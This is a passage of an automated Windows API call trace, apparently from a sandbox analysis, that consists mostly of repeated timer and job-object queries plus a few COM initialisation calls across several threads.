lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0284.170] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0284.171] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0284.172] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0288.230] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0288.230] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0288.233] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0289.255] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0289.255] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0289.255] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0291.287] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0291.288] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0291.288] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0293.336] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0293.336] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0293.337] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0295.365] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0295.365] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0295.365] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0297.406] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0297.406] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0297.407] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0299.434] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0299.435] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0299.435] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0301.465] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0301.465] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0301.466] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0302.478] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0302.478] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0302.478] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0303.498] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0303.499] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0303.499] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0304.512] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0304.512] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0304.512] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0305.532] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0305.532] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0305.532] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0307.568] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0307.570] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0307.571] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0309.594] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0309.595] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0309.595] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0311.662] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0311.663] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0311.663] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0313.696] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0313.696] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0313.697] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0315.730] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0315.731] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0315.731] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0317.750] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0317.750] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0317.750] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0319.780] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0319.780] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0319.780] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0320.794] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0320.794] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0320.794] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0321.812] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0321.812] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0321.812] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0322.818] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0322.819] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0322.819] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0323.836] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0323.837] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0323.837] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0325.866] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0325.866] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0325.867] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0327.892] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0327.892] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0327.892] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0329.902] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0329.902] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0329.902] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0331.932] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0331.932] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0331.932] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0333.944] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0333.944] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0333.945] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0335.969] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0335.969] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0335.970] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0338.000] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0338.001] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0338.001] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0339.020] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0339.020] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0339.021] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0340.039] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0340.039] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0340.039] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0341.056] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0341.057] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0341.057] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 [0342.071] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708efc8 | out: UnbiasedTime=0xb15708efc8) returned 1 [0342.071] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15708ef78 | out: UnbiasedTime=0xb15708ef78) returned 1 [0342.071] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15708ee58, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15708ee58, lpReturnLength=0x0) returned 0 Thread: id = 20 os_tid = 0x3a4 Thread: id = 21 os_tid = 0x6f0 Thread: id = 22 os_tid = 0x1350 [0145.291] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0145.292] CoGetContextToken (in: pToken=0xb15718f980 | out: pToken=0xb15718f980) returned 0x0 [0145.292] CObjectContext::QueryInterface () returned 0x0 [0145.292] CObjectContext::GetCurrentThreadType () returned 0x0 [0145.293] Release () returned 0x0 [0145.293] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0145.293] CoUninitialize () [0145.293] RoInitialize () returned 0x1 [0145.293] RoUninitialize () returned 0x0 [0173.370] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0173.370] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0173.372] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 1 [0174.431] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0174.431] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0174.431] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0176.926] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0176.927] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0176.927] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0178.980] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0178.980] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0178.981] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0181.039] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0181.039] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0181.040] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0183.068] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0183.068] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0183.068] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0184.087] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0184.087] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0184.087] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0185.101] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0185.101] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0185.101] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0187.176] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0187.176] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0187.176] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0189.191] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0189.191] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0189.191] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0191.238] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0191.238] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0191.238] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0193.290] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0193.290] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0193.290] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0195.319] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0195.319] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0195.319] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0197.342] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0197.342] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0197.342] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0199.362] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0199.363] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0199.363] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0200.384] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0200.385] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0200.385] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0201.421] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0201.422] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0201.422] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0203.451] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0203.451] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0203.451] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0205.478] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0205.478] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0205.478] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0207.500] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0207.500] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0207.500] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 